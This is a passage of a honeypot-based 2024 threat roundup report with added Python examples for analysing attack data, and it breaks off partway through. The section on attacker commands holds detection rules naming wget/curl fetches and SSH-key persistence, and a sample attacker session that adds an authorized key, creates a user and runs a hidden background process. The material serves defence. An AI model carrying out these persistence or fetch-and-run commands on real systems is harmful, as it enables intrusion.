2024 Global Threat Roundup Report

Contents

1. Executive Summary · 3
2. Main Findings · 5
2.1. Location – Russia Retakes China's Position · 6
2.2. Autonomous Systems – New Techniques for Routing Attacks · 7
2.3. Attacked Services – the Web Is the Undisputed Leader · 9
2.4. Weak Credentials – a Return to Generic Usernames · 10
2.5. Exploits – There's Still Much Beyond KEV · 12
2.6. OT Attacks – Increased Focus on Building Automation · 15
2.7. Attacker Actions/TTPs – the Rise of Discovery · 17
2.8. Malware – Botnets Again at the Top · 19
2.9. Threat Actors – More Conflicts Bring More Threat Actors to the Scene · 21
3. Evolution of Attacks on Critical Infrastructure · 23
3.1. Who Is Being Attacked? · 23
3.2. Who Is Attacking? · 26
4. Conclusion · 30

Forescout 2024 Threat Roundup | 2


1. Executive Summary

From the financial impact of attacks to geopolitical tensions that lead to cyberwarfare, cybersecurity is top of mind for enterprise and government organizations in 2025. In this report, we look back at the 900 million attacks we analyzed in the threat landscape of 2024. Additionally, we offer organizations tactical insights and strategic recommendations for improving defenses this year.

Cyberattacks are on the rise once again – including an uptick of targets in critical infrastructure in the last year. Since 2022, however, reported incidents in critical infrastructure rose from 50 to 384 globally – or 668%, according to data from the European Repository of Cyber Incidents, an independent research consortium that provides scientific analysis of cyber incidents.

Take note: We also include information on vulnerabilities and exploits that are not on the CISA KEV list but are being exploited today.

KEY FINDINGS

ATTACK DATA

Attacks by location: 900 million attacks originated from 213 countries. The top 10 countries accounted for 78% of the malicious traffic. Most common origin of attack: Russia > China. Most threat actor groups: China (2x) > Russia.

Attacks by source: 57% of all attacks originated from IPs managed by ISPs; 33% from organizations in business, government and other sectors; 10% from hosting or cloud providers. Steady increase in attacks launched by compromised devices via residential and other proxies.

Post-exploitation actions: 84% Discovery (up from 25% in 2023); 12% Persistence; 4% Execution.

Exploits outside the CISA KEV catalog: only 27% of exploited vulnerabilities appeared in CISA KEV (down from 35% in 2023). 25 OT and Industrial IoT vulnerabilities are not listed on the CISA KEV list and are actively exploited.

Top 3 attacked service types: web applications (via exploited vulnerabilities); remote management protocols; remote management services, including specific usernames linked to databases, cloud and DevOps infrastructure.

Top exploit targets: web applications; network infrastructure devices.

Protocol target spotlight: OT. 5 OT protocols targeted: Modbus 40%, Ethernet/IP 28%, Step7, DNP3 and BACnet (24% combined, 8% each). 3 building automation protocols targeted: BACnet, Fox, KNX.

Attacks on critical infrastructure (CI): 10% increase year over year.


Where Does Our Data Come From?

Most data used for our analysis comes from the Vedere Labs Adversary Engagement Environment (AEE), a set of honeypots on the open internet luring attackers and recording their interactions. Data points in the AEE are called attacks. They can represent a multitude of malicious actions, including port scanning and brute forcing. The AEE recorded more than 900 million attacks between January and December 2024. A subset of these attacks contains exploits: attempts to exploit vulnerabilities.

Our data differs from what is seen in many other threat reports because it comes from specialized IT/OT/IoT honeypots that either mimic realistic device profiles – including exposed protocols, banners and parts of the file system – or are real specialized devices, instead of generic honeypots capturing every kind of attack.

Our Malware Analysis Lab (MAL) collects and analyzes samples dropped by attackers on the AEE or shared on public repositories. Our goal is not to analyze as many samples as possible, but to focus on those that are unique. We analyzed more than 100,000 unique malware samples between January and December 2024.

Also, we constantly hunt for new command and control (C2) infrastructure and maintain a threat actor knowledge base with data about more than 800 threat actors.

[Diagram: Attackers interact with the Adversary Engagement Environment (AEE); samples feed the Malware Analysis Lab (MAL); Security Researchers, the Threat Actor Knowledge Base, the Intel Factory, Infrastructure data and C2 Hunting feed the Forescout Vedere Labs 2024 Threat Roundup.]


2. Main Findings

2.1. Location – Russia Retakes China's Position

[Figure: Top attacker IP locations. Source: Forescout Research – Vedere Labs]

Figure 1 – Distribution of attacks by IP address country of origin

Figure 1 shows the distribution of attacks detected by country of origin. We detected attacks originating from 213 countries and territories (1 more than in 2023 and 22 more than in 2022). Countries appear in this list due to the presence of legitimate hosting providers being abused by attackers; the presence of bulletproof hosting providers that cater specifically to cybercriminal activities; or the use of compromised hosts to launch attacks.

This year, the top 10 countries accounted for 78% of the malicious traffic. This is a negligible difference of 1% more than in 2023 but consistent with the growth observed since 2022 (73%). The top 10 list of countries originating attacks has only one entry different from 2023: Poland replaced Singapore. However, the ranks have changed considerably. The most notable change: Russia rose from 9% to 16% of attacks. China decreased from 18% to 8%.

It is important to stress that this is not direct attribution of attack locations; it is only where we can see attacks coming from as they hit our honeypots. Our threat actor database shows that most actors are still located in China – although it does not necessarily mean it is the source of individual attacks.

Fact: China and Russia have been in the top 3 of IP address attack origins since 2022.

Insight for Defenders: Country of origin alone continues to be ineffective to judge the risk of a particular IP address. However, if your organization does not do business with – or in – countries with the highest number of IP addresses that attack, blocking those IP ranges may help reduce SOC noise.


2.2. Autonomous Systems – New Techniques for Routing Attacks

Source: Forescout Research – Vedere Labs

Figure 2 – Distribution of attacks by originating Autonomous System

Attacks again originated from more than 500 autonomous systems (AS), which are blocks of IP addresses under the control of an organization. Figure 2 shows the percentage of attacks coming from the three types of AS we observe:

• Internet Service Providers (ISPs) increased from 53% in 2023 to 57% in 2024.

• Business, Government and others decreased from 36% to 33%.

• Hosting or cloud providers decreased from 11% to 10%.

Note that the percentages shown above differ from what was presented in last year's report because we removed the "unknown" category of AS and only show the numbers of those we can classify.

As we discussed last year, the large chunk of attacks coming from ISPs as well as business, government and other organizations signifies an increase in the use of compromised devices to launch attacks as opposed to leasing infrastructure from dedicated providers.

In 2023, we attributed this to the increased popularity of "residential proxy" services, where threat actors proxy their traffic via applications running on residential devices, which typically have IP addresses managed by ISPs. Residential proxies continue to be popular, with emerging threat actors specializing in selling access to hijacked IoT devices for this very purpose, something we predicted in early 2023. However, advanced persistent threat actors have now gone even further and developed Operational Relay Boxes (ORB) networks, where they mix virtual private servers, compromised IoT and hijacked network perimeter devices, creating layers of proxying to make detection and attribution of attacks more challenging.

On the cloud side, the use of Amazon and Google infrastructure continued to be significant, with those two alone accounting for more than 11% of the attacks we observed. A notable change was that the major Chinese cloud provider Alibaba jumped from 22nd most popular AS in 2023 to sixth in 2024.

Overall, the top 10 ASes are responsible for 48% of attacks (4% less than in 2023). Six ASes from the top 10 in 2023 remain in the list in 2024: Xhost Internet Solutions Lp, GOOGLE-CLOUD-PLATFORM, LIONLINK-NETWORKS, DIGITALOCEAN-ASN, Contabo GmbH and ChangWay Technologies Co. Limited.


Fact: Autonomous Systems continue to be a better sign of risk than country of origin.

Insight for Defenders: IPs belonging to known risky autonomous systems should always be treated with care – especially those that remain in the top 10 for years, such as DigitalOcean. Continued attacker interest in compromised devices to route actions shows organizations need real-time threat intelligence about compromised devices in the wild and the types of device attackers focus on. This goes beyond APTs targeting a specific organization. Be wary of opportunistic Initial Access Brokers (IAB) that breach as many organizations as possible and sell that access.
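The per-AS-type breakdown behind Figure 2, and the effect of dropping the "unknown" AS bucket that the report mentions, can be reproduced on any attacker IP log. The following is an added example, not Forescout's code: the prefix-to-AS table, the AS names and the attacker IP list are constructed (a real pipeline would resolve IPs through a routing or WHOIS data source), and the watchlist is hypothetical.

```python
"""Attack-origin breakdown by autonomous-system type (the Figure 2 view).

Added example, not Forescout's code. The prefix-to-AS table and the attacker
IP list are constructed; AS names are hypothetical. A real pipeline would
resolve IPs through a routing or WHOIS data source instead of this table.
"""
import ipaddress
from collections import Counter

# Constructed lookup table: prefix -> (AS name, AS type). Hypothetical names.
AS_TABLE = [
    ("198.51.100.0/24", "EXAMPLE-ISP", "isp"),
    ("192.0.2.0/24", "EXAMPLE-UNIVERSITY", "business_gov_other"),
    ("203.0.113.0/24", "EXAMPLE-CLOUD", "hosting"),
    ("100.64.0.0/10", "EXAMPLE-UNROUTED", "unknown"),
]
NETWORKS = [(ipaddress.ip_network(p), name, kind) for p, name, kind in AS_TABLE]

# Constructed watchlist of AS names treated as persistently risky.
WATCHLIST = {"EXAMPLE-CLOUD"}


def lookup_as(ip):
    """Return (AS name, AS type) for an IP; ('UNKNOWN', 'unknown') if no prefix matches."""
    addr = ipaddress.ip_address(ip)
    for net, name, kind in NETWORKS:
        if addr in net:
            return name, kind
    return "UNKNOWN", "unknown"


def share_by_as_type(attacker_ips, drop_unknown=True):
    """Percentage of attacks per AS type, rounded to one decimal.

    With drop_unknown=True the 'unknown' bucket is discarded before the
    shares are computed, which is what the report did for its 2024 figures
    and why those percentages are not comparable with the 2023 report.
    """
    counts = Counter(lookup_as(ip)[1] for ip in attacker_ips)
    if drop_unknown:
        counts.pop("unknown", None)
    total = sum(counts.values())
    if not total:
        return {}
    return {kind: round(100 * n / total, 1) for kind, n in counts.items()}


def watchlisted(attacker_ips, watchlist=WATCHLIST):
    """Attacker IPs whose AS is on the watchlist, for SOC triage."""
    return [ip for ip in attacker_ips if lookup_as(ip)[0] in watchlist]


# Constructed attacker IP log: 20 source addresses from documentation and
# shared address ranges.
SAMPLE_ATTACKER_IPS = (
    ["198.51.100.%d" % i for i in range(1, 11)]   # 10 from the ISP
    + ["192.0.2.%d" % i for i in range(1, 6)]     # 5 from business/government
    + ["203.0.113.%d" % i for i in range(1, 3)]   # 2 from the hosting provider
    + ["100.64.0.%d" % i for i in range(1, 4)]    # 3 from an unclassified AS
)

if __name__ == "__main__":
    print(share_by_as_type(SAMPLE_ATTACKER_IPS, drop_unknown=False))
    print(share_by_as_type(SAMPLE_ATTACKER_IPS))
    print(watchlisted(SAMPLE_ATTACKER_IPS))
```

Running it with and without `drop_unknown` shows why year-over-year comparisons need the same normalization: the ISP share of the same 20 records is 50.0% with the unknown bucket kept and 58.8% with it removed.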


2.3. Attacked Services – the Web Is the Undisputed Leader

Source: Forescout Research – Vedere Labs

Figure 3 – Distribution of attacked ports and services

Figure 3 shows the share of traffic targeting each type of network service, classified according to assigned or well-known IPv4 TCP destination ports. Web applications increased from 26% in 2022 and 2023 to 41% in 2024, continuing to be the most attacked service type and widening the gap with the other targets. Most attacks against these services are either scanning or attempts at vulnerability exploitation (see section 2.5).

Remote management protocols, such as RDP and VNC for remote desktop, and SSH and Telnet for remote terminals, increased from 26% in 2023 to 33% this year. It was 43% in 2022. Attacks on these protocols are mainly brute forcing or password spraying (see section 2.4).

Remote storage protocols, such as SMB and FTP, remained relatively stable, changing from 20% to 19%, continuing their decrease from 23% in 2022. Networking protocols, such as DNS, DHCP and CWMP/TR-069, decreased from 10% to 3%, returning to the baseline in 2022 of 1%.

Database services, such as Microsoft SQL Server, Redis, MongoDB, MySQL and PostgreSQL, decreased from 6% to 1%, returning to 2022 levels.

E-mail services, such as IMAP, POP3 and SMTP, remained unchanged since 2022 at less than 1% of attacks.

Fact: Web applications are, without a doubt, the most attacked service type, continuing the trend from 2023.

Insight for Defenders: Ensure that defenses, such as web application firewalls, are in place to detect and prevent attacks such as command injections, cross-site scripting and SQL injections as early as possible. The increase in attacks on remote management protocols is also significant because most of those are related to credential-based attacks. Best practices in credentials are paramount, such as avoiding default and easily guessed passwords.


2.4. Weak Credentials – a Return to Generic Usernames

Source: Forescout Research – Vedere Labs

Figure 4 – Top abused credentials

Figure 4 shows the most abused credentials we observed, divided in two categories:

Generic usernames include "root," "admin," "user," "guest" and several other such credentials. The increase from 85% in 2023 to 95% in 2024 shows that attackers are again relying more heavily on brute-forcing and simple dictionary attacks than on targeting specific devices. This is even higher than the 87% we observed in 2022.

Specific usernames (decreased from 15% to 5%) can be associated with specific roles, such as "www," "backup," "deployer" or even specific applications and devices, such as "odoo," "rpi," "kafka," "zabbix" or "ec2-user".

Even though the overall percentage of specific usernames decreased, it's still relevant to analyze the breakdown of types of specific usernames that attackers are abusing. In 2023, the most popular category was IoT devices (35%), which is now the fourth most abused type of username. Database, DevOps and Cloud all became much more relevant than in previous years. The data is consistent with what we discussed in section 2.3, since often these types of services are web applications.

In the IoT category, the most popular usernames were "ubnt" (for Ubiquiti routers), "moxa" (for industrial networking) and "zyfwp" (for Zyxel firewalls). In February 2024, we published an analysis of botnets targeting Ubiquiti routers since there was a takedown of Moobot which had been commandeered by Russia's APT28.

Fact: Best practices for credential management are crucial to prevent attacks leveraging weak credentials.

Insight for Defenders: NIST released an updated version of its digital identity guidelines in August 2024 that challenges some long-held assumptions in the cybersecurity community about password complexity and the need for periodic changes.
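The generic-versus-specific split of Figure 4, and the per-category breakdown of the specific usernames, is a classification any honeypot or auth-log owner can run on their own failed-login data. The following is an added example, not Forescout's code: the category lists are seeded with the usernames the report names and padded with a few common ones, the grouping into iot/database/devops/cloud/role is this example's own assumption, the password blocklist is a short constructed one, and the login-attempt log is constructed.

```python
"""Classify abused usernames from honeypot login attempts into the two
categories of Figure 4 (generic vs. specific) and break the specific ones
down by what they point at.

Added example, not Forescout's code. The category lists are seeded with the
usernames the report names and padded with a few common ones; the grouping
into iot/database/devops/cloud/role is this example's own, and the login
attempt log is constructed.
"""
from collections import Counter

GENERIC = {"root", "admin", "administrator", "user", "guest", "test", "support"}

# Specific usernames grouped by the role, application or device they target.
SPECIFIC = {
    "iot": {"ubnt", "moxa", "zyfwp", "rpi", "pi"},
    "database": {"postgres", "mysql", "oracle", "mongodb", "redis"},
    "devops": {"deployer", "jenkins", "git", "kafka", "zabbix", "odoo"},
    "cloud": {"ec2-user", "ubuntu", "azureuser", "centos"},
    "role": {"www", "www-data", "backup", "ftp", "nagios"},
}
SPECIFIC_INDEX = {name: cat for cat, names in SPECIFIC.items() for name in names}

# Constructed blocklist: passwords that should never be accepted regardless
# of complexity rules.
COMMON_PASSWORDS = {"123456", "password", "admin", "root", "12345678", "qwerty"}


def classify_username(username):
    """Return ('generic', None), ('specific', category) or ('unknown', None)."""
    u = username.strip().lower()
    if u in GENERIC:
        return "generic", None
    if u in SPECIFIC_INDEX:
        return "specific", SPECIFIC_INDEX[u]
    return "unknown", None


def is_weak_pair(username, password):
    """True for the credential pairs brute-force lists lead with:
    empty password, username-as-password, or a blocklisted password."""
    p = password.strip().lower()
    return p == "" or p == username.strip().lower() or p in COMMON_PASSWORDS


def _shares(counter):
    total = sum(counter.values())
    return {k: round(100 * v / total, 1) for k, v in counter.items()} if total else {}


def credential_breakdown(attempts):
    """(generic/specific shares, per-category shares of the specific ones).

    Usernames matching neither list are left out of both, since the report's
    two categories only cover usernames it could classify.
    """
    kinds, cats = Counter(), Counter()
    for username, _password in attempts:
        kind, cat = classify_username(username)
        if kind == "unknown":
            continue
        kinds[kind] += 1
        if cat:
            cats[cat] += 1
    return _shares(kinds), _shares(cats)


# Constructed login-attempt log: (username, password) pairs seen by a honeypot.
SAMPLE_ATTEMPTS = (
    [("root", "123456")] * 10 + [("admin", "admin")] * 6
    + [("user", "user")] * 2 + [("guest", "")]
    + [("postgres", "postgres"), ("mysql", "mysql"), ("ec2-user", "ec2-user"),
       ("ubnt", "ubnt"), ("deployer", "deploy"), ("www", "www")]
    + [("jdoe", "S7rong-Passphrase!")]   # matches neither list -> ignored
)

if __name__ == "__main__":
    print(credential_breakdown(SAMPLE_ATTEMPTS))
    print(sum(is_weak_pair(u, p) for u, p in SAMPLE_ATTEMPTS), "weak pairs")
```

The `is_weak_pair` check is the defensive counterpart of the same data: a blocklist of known-bad passwords plus a username-equals-password rule catches most of what the dictionary attacks described above try first, without relying on complexity rules.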


2.5. Exploits – There's Still Much Beyond KEV

Source: Forescout Research – Vedere Labs

Figure 5 – Vulnerabilities exploited during the study period

Exploit attempts against web servers and applications have been on a steady rise since 2022, and continue as the largest category we see:

• 2022: 14%

• 2023: 36%

• 2024: 56%

This is in line with what we observed for targeted services in section 2.3.

Exploits against network infrastructure devices, such as firewalls, routers, and VPN appliances, increased from 3% in 2022 to 11% in 2023 and now 14%, becoming the second most popular category. We discussed this ongoing trend in our 2024 H1 threat review. Software libraries continue to decrease as a percentage of targets for exploitation:

• 2022: 76%

• 2023: 29%

• 2024: 14%

Several categories of IoT devices and other applications known to be often exposed and vulnerable are also routinely targeted, but this category decreased from 24% to 16%.

Three other observations are relevant. First, five of the top 10 most exploited vulnerabilities we reported in 2023 remained in the list in 2024:

• CVE-2021-36260 affecting Hikvision

• CVE-2022-0543 affecting Redis

• CVE-2021-38647 affecting Microsoft Windows

• CVE-2020-0796 affecting Microsoft Windows

• CVE-2021-22205 affecting GitLab

Two new entries are especially relevant: CVE-2023-4966 and CVE-2024-1709. CVE-2023-4966, which affects Citrix NetScaler, appeared as a 0-day in 2023 but continued to be heavily exploited in 2024. CVE-2024-1709, affecting ConnectWise ScreenConnect, is notoriously easy to exploit and was used in ransomware campaigns. Only one of these has been on the list since 2022: CVE-2022-0543, which affects Redis on Debian systems.

Second, the percentage of exploited vulnerabilities not in CISA's Known Exploited Vulnerabilities (KEV) catalog increased from 65% to 73%. We published a study in May detailing this phenomenon and predicting that it would continue to increase as attackers explore more of organizations' attack surface beyond traditional endpoints.

Third, when we merge our AEE data with observations from the Shadowserver Foundation, we come up with a list of at least 25 vulnerabilities affecting OT and Industrial IoT devices that are exploited by botnets or automated attacks and which are not included in CISA's KEV (shown below).


Vendor | Products | CVEs
Apsystems | Altenergy Power Control Software | CVE-2023-28343
Carel | pCOWeb | CVE-2019-11370
CHIYU Technology | CHIYU BF-430, BF-431 and BF-450M | CVE-2021-31250
CONTEC | SolarView Compact | CVE-2023-23333, CVE-2022-29303, CVE-2022-40881, CVE-2023-29919
Eaton | Intelligent Power Manager | CVE-2018-12031
ECOA | Building Automation System | CVE-2021-41293
Emerson | Dixell XWEB-500 | CVE-2021-45420
Endress+Hauser | WirelessHART Fieldgate SWG70 | CVE-2018-16059
frangoteam | FUXA | CVE-2023-33831
Honeywell | Honeywell PM43 | CVE-2023-3710
KevinLAB | Building Energy Management System | CVE-2021-37291
Linear | eMerge | CVE-2019-7254, CVE-2019-7256, CVE-2022-46381
Loytec | LGATE-902 | CVE-2018-14918
Open Automation Software | OAS Platform | CVE-2022-26833
Schneider Electric | EVlink City, Parking and Smart Wallbox | CVE-2021-22707
Schneider Electric | SpaceLogic C-Bus Home Controller | CVE-2022-34753
Teltonika | Teltonika RUT9XX series | CVE-2018-17532
Viessmann | Vitogate 300 BN/MB | CVE-2023-45852
WAGO | WAGO products (multiple) | CVE-2023-1698
ZKTeco | ZKTeco ZEM500-510-560-760, ZEM600-800, ZEM720, ZMM | CVE-2022-42953
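A patching policy driven only by the KEV catalog will miss exactly the vulnerabilities in the table above, so a useful check is to take the CVEs actually being exploited against your exposure and measure how many of them the catalog covers. The following is an added example, not Forescout's code: the exploit-attempt counts are constructed, the KEV snapshot is a constructed stand-in and not the real catalog (a real check would load CISA's KEV JSON feed and match on CVE IDs), and the OT table is a subset of the one printed in the report.

```python
"""Check observed exploitation against a KEV snapshot: what share of the
exploited CVEs is in the catalog, and which OT/IIoT ones are not.

Added example, not Forescout's code. The exploit-attempt counts and the KEV
snapshot are constructed for this example (the snapshot is NOT the real
catalog; a real check would load CISA's KEV JSON feed and match CVE IDs).
The OT CVE table is a subset of the one printed in the report.
"""
from collections import Counter

# Constructed KEV snapshot: CVE IDs assumed to be listed, for this example only.
KEV_SNAPSHOT = {
    "CVE-2021-36260", "CVE-2022-0543", "CVE-2021-38647", "CVE-2020-0796",
    "CVE-2021-22205", "CVE-2023-4966", "CVE-2024-1709",
}

# OT / Industrial IoT CVEs from the report's table (subset), with vendor/product.
OT_CVES = {
    "CVE-2023-28343": "Apsystems Altenergy Power Control Software",
    "CVE-2019-11370": "Carel pCOWeb",
    "CVE-2021-31250": "CHIYU Technology BF-430, BF-431 and BF-450M",
    "CVE-2023-23333": "CONTEC SolarView Compact",
    "CVE-2022-29303": "CONTEC SolarView Compact",
    "CVE-2018-12031": "Eaton Intelligent Power Manager",
    "CVE-2021-41293": "ECOA Building Automation System",
    "CVE-2023-33831": "frangoteam FUXA",
    "CVE-2019-7256": "Linear eMerge",
    "CVE-2022-34753": "Schneider Electric SpaceLogic C-Bus Home Controller",
    "CVE-2023-1698": "WAGO products (multiple)",
}


def kev_coverage(observed, kev=KEV_SNAPSHOT):
    """(percentage of distinct exploited CVEs in KEV, percentage not in KEV)."""
    cves = set(observed)
    if not cves:
        return 0.0, 0.0
    in_kev = len(cves & kev)
    pct_in = round(100 * in_kev / len(cves), 1)
    return pct_in, round(100 - pct_in, 1)


def unlisted_exploits(observed, kev=KEV_SNAPSHOT, ot_table=OT_CVES):
    """Exploited CVEs missing from KEV, most-attempted first, with the
    affected product where the CVE is in the report's OT table.

    These are the ones a KEV-only patching policy would never surface.
    """
    rows = [(cve, n, ot_table.get(cve, "(not in OT table)"))
            for cve, n in observed.items() if cve not in kev]
    return sorted(rows, key=lambda r: -r[1])


# Constructed exploit-attempt counts per CVE seen on the honeypots.
SAMPLE_OBSERVED = Counter({
    "CVE-2023-4966": 120, "CVE-2021-36260": 90, "CVE-2022-0543": 60,
    "CVE-2023-23333": 40, "CVE-2021-22205": 30, "CVE-2024-1709": 25,
    "CVE-2019-11370": 15, "CVE-2018-12031": 5,
})

if __name__ == "__main__":
    print(kev_coverage(SAMPLE_OBSERVED))
    for cve, attempts, product in unlisted_exploits(SAMPLE_OBSERVED):
        print(f"{cve}  {attempts:>4} attempts  {product}")
```

The coverage figure counts distinct CVEs rather than attempt volume, which is the sense in which the report quotes its 73%; weighting by attempts instead would let a handful of heavily exploited KEV entries mask the long tail of unlisted OT vulnerabilities.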

Guidance: Pay more attention to attacker goals and industry targets over country of origin alone.

Insight for defenders: Blocking communications simply by country of origin is not effective. Similarly, knowing where threat actors come from is not necessarily the most useful information. However, knowing what their goals are and what industries they are attacking can help to prioritize strategic security investments. Organizations in the most affected industries, especially, should pay attention to the latest threat intelligence to monitor campaigns that target specific sectors.


2.6. OT Attacks – Increased Focus on Building Automation

Source: Forescout Research – Vedere Labs

Figure 6 – Attacks against OT protocols

Figure 6 shows the distribution of attacks targeting OT protocols. As in 2023, we highlight five protocols as the top exploited:

1. Modbus, the most popular and most often exposed OT protocol, increased from 33% to 40%

2. EtherNet/IP increased from 19% to 28%

3. Step7, used by Siemens devices, decreased from 18% to 8%

4. DNP3, often used in utilities, decreased from 18% to 8%

5. BACnet, used for building automation, is the fifth most attacked protocol with 7% of total attacks

The list of other protocols remained similar to last year – with two notable changes. 'Others' increased from 2% to 9% and a new building automation protocol (KNX/IP) appeared on the list as the third most relevant. Overall, the data paints a picture of a heavy interest in Modbus and more fragmented interest in a diversity of other protocols. It means it is not enough to focus on the popular protocols for which the most common attack tools are available.

Looking at categories, we see that attacks on industrial automation protocols increased from 71% to 79%, utilities decreased significantly from 28% to 12% and building automation increased from 1% to 9%. The most relevant increase is in the building automation category, especially when we look at the new protocols being attacked. Last year, we discussed how attacks on building automation focused on exploiting vulnerabilities rather than interacting directly with protocols. This year, we see that the interest in building automation protocols is increasing as attackers are still exploiting vulnerabilities on those devices (as evidenced by the table in section 2.5).


Fact: Monitoring the traffic to and from OT devices is now as critical as monitoring IT traffic.

Insight for defenders: Attackers are constantly probing OT/ICS assets for weaknesses. Many organizations will be blind to them because they do not have visibility into their OT/IoT infrastructure. The truth is that building automation, and protocols such as Modbus, are now found in almost every organization and are a target for attackers.
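Both the service-type breakdown of section 2.3 (Figure 3) and the OT protocol and category breakdown of this section (Figure 6) come down to the same step: classify each connection attempt by its destination port and compute shares. The following is an added example covering both, not Forescout's code. The port-to-service mapping uses well-known assigned ports for the services and protocols the report names; the connection records are constructed.

```python
"""Classify honeypot connection attempts by destination port into the
service types of Figure 3 and the OT protocols/categories of Figure 6.

Added example, not Forescout's code. The port mappings use well-known
assigned ports for the services the report names; the records are constructed.
"""
from collections import Counter

# Well-known destination ports -> IT service type (Figure 3 categories).
IT_SERVICES = {
    80: "web", 443: "web", 8080: "web", 8443: "web",
    22: "remote_management", 23: "remote_management",      # SSH, Telnet
    3389: "remote_management", 5900: "remote_management",  # RDP, VNC
    445: "remote_storage", 21: "remote_storage",           # SMB, FTP
    53: "networking", 67: "networking", 7547: "networking",  # DNS, DHCP, CWMP/TR-069
    1433: "database", 6379: "database", 27017: "database",  # MSSQL, Redis, MongoDB
    3306: "database", 5432: "database",                     # MySQL, PostgreSQL
    25: "email", 110: "email", 143: "email",                # SMTP, POP3, IMAP
}

# OT protocol ports -> (protocol, category) for the Figure 6 breakdown.
OT_PROTOCOLS = {
    502: ("Modbus", "industrial_automation"),
    44818: ("EtherNet/IP", "industrial_automation"),
    102: ("Step7", "industrial_automation"),
    20000: ("DNP3", "utilities"),
    47808: ("BACnet", "building_automation"),
    3671: ("KNX/IP", "building_automation"),
    1911: ("Fox", "building_automation"),
}


def classify_port(port):
    """Service type for an attacked port; any OT protocol is bucketed as 'ot'."""
    if port in OT_PROTOCOLS:
        return "ot"
    return IT_SERVICES.get(port, "other")


def shares(labels):
    """Percentage share of each label, rounded to one decimal."""
    counts = Counter(labels)
    total = sum(counts.values())
    return {k: round(100 * v / total, 1) for k, v in counts.items()} if total else {}


def service_breakdown(records):
    """Share of attacks per IT service type over (source IP, dest port) records."""
    return shares(classify_port(port) for _, port in records)


def ot_breakdown(records):
    """(share per OT protocol, share per OT category), OT ports only."""
    ot = [OT_PROTOCOLS[port] for _, port in records if port in OT_PROTOCOLS]
    return shares(p for p, _ in ot), shares(c for _, c in ot)


# Constructed connection records: (source IP, destination port), 25 in total.
SAMPLE_RECORDS = (
    [("198.51.100.1", 80)] * 4 + [("198.51.100.2", 443)] * 2
    + [("198.51.100.3", 22)] * 3 + [("198.51.100.4", 3389)]
    + [("198.51.100.5", 445)] * 2 + [("198.51.100.6", 6379)]
    + [("198.51.100.7", 53)]
    + [("203.0.113.1", 502)] * 4 + [("203.0.113.2", 44818)] * 2
    + [("203.0.113.3", 102), ("203.0.113.4", 20000),
       ("203.0.113.5", 47808), ("203.0.113.6", 3671)]
    + [("192.0.2.9", 9999)]   # unassigned port -> 'other'
)

if __name__ == "__main__":
    print(service_breakdown(SAMPLE_RECORDS))
    print(ot_breakdown(SAMPLE_RECORDS))
```

The two breakdowns deliberately share one classifier: the same port table that tells a SOC "this is web scanning" also tells it "this is a Modbus or KNX/IP probe", and the 'other' bucket is where the fragmented long tail the report describes shows up, so it is worth inspecting rather than dropping.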


2.7. Attacker Actions/TTPs – the Rise of Discovery

Source: Forescout Research – Vedere Labs

Figure 7 – Top executed commands

Figure 7 shows the distribution of the top 10 commands executed after attackers managed to get initial access – mainly over SSH or Telnet. Most of the attacks we observed were automated and used the following ATT&CK tactics:

TA0007 – Discovery represents around 84% of post-exploitation activities, up from 25% in 2023. These activities include obtaining information such as CPU, RAM, file system, operating system and architecture, as well as listing logged-in users, running processes and scheduled jobs. Discovery accounted for 95% of actions in 2022.

TA0003 – Persistence represents around 12% of observed commands, down from 50% observed in 2023 but still up from the original 3% in 2022. Persistence comprises four main procedures: persisting SSH keys, downloading backdoored shells, creating or manipulating user accounts and executing background processes.

TA0002 – Execution represents around 4% of observed commands, down from 25% in 2023 but also still up from the 1% of 2022. These commands are related to interacting with the file system, downloading and executing further malware.


Fact: An increase in discovery actions means attackers are spending more time interacting with a breached system before moving on to other targets, to either understand the system or to find other potential victims.

Insight for Defenders: More time spent on discovery creates new opportunities for detection before more damaging actions are taken on a device, such as data exfiltration, deletion or encryption. It is crucial to be able to detect signs of these discovery actions as soon as possible, either via endpoint telemetry about system discovery or via network signals generated by network discovery actions.
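The tactic distribution of Figure 7, and the early-detection opportunity the insight describes, can be reproduced from a session's command history (honeypot transcript or endpoint shell telemetry) with a rule-based mapping from commands to the three tactics. The following is an added example, not Forescout's code: the regex rules are this example's own small approximation of such a mapping (not the AEE's rules), the session log is constructed, and the URL and key material in it are placeholders.

```python
"""Tag commands executed after an SSH/Telnet login with the ATT&CK tactics the
report uses (Discovery, Persistence, Execution), compute the Figure 7
distribution and flag a discovery burst early in the session.

Added example, not Forescout's code. The regex rules are this example's own
small approximation of such a mapping (not the AEE's rules); the session log
is constructed, and the URL and key material in it are placeholders.
"""
import re
from collections import Counter

# Ordered (pattern, tactic) rules; the first match wins. Hypothetical rule set.
RULES = [
    (r"^(cat /proc/(cpuinfo|meminfo)|cat /etc/os-release|free\b|df\b|uname\b|nproc\b|lscpu\b|arch\b)",
     "TA0007-Discovery"),     # hardware / OS / file-system enumeration
    (r"^(w\b|who\b|whoami\b|id\b|ps\b|ls\b|crontab -l)",
     "TA0007-Discovery"),     # users, processes, directories, scheduled jobs
    (r"authorized_keys|useradd|usermod|passwd\b|nohup\b|/etc/rc\.local|&\s*$",
     "TA0003-Persistence"),   # SSH keys, accounts, background processes
    (r"\b(wget|curl|tftp)\b|chmod \+x|(^|[;&|]\s*)\./",
     "TA0002-Execution"),     # fetch and run further payloads
]
COMPILED = [(re.compile(p), tactic) for p, tactic in RULES]


def tag_command(command):
    """ATT&CK tactic for one command line, or 'other' if no rule matches."""
    for pattern, tactic in COMPILED:
        if pattern.search(command):
            return tactic
    return "other"


def tactic_distribution(commands):
    """Percentage of commands per tactic, rounded to one decimal."""
    counts = Counter(tag_command(c) for c in commands)
    total = sum(counts.values())
    return {t: round(100 * n / total, 1) for t, n in counts.items()} if total else {}


def discovery_alert_position(commands, min_discovery=5):
    """1-based position at which the session has issued min_discovery
    Discovery commands, or None. Alerting here is earlier than waiting for
    persistence or execution, which is the window the insight points at."""
    seen = 0
    for pos, c in enumerate(commands, start=1):
        if tag_command(c) == "TA0007-Discovery":
            seen += 1
            if seen >= min_discovery:
                return pos
    return None


# Constructed post-login session, 25 command lines.
SAMPLE_SESSION = [
    "cat /proc/cpuinfo | grep name | wc -l", "free -m", "uname -a", "df -h",
    "cat /etc/os-release", "ps aux", "w", "crontab -l", "ls -la /tmp", "whoami",
    "nproc", "lscpu", "arch", "id", "who", "cat /proc/meminfo", "uname -m",
    "ls /", "df", "ps -ef", "cat /proc/cpuinfo",
    "echo 'ssh-rsa AAAA...PLACEHOLDER' >> ~/.ssh/authorized_keys",
    "useradd -m svc_backup",
    "nohup /tmp/.x/run >/dev/null 2>&1 &",
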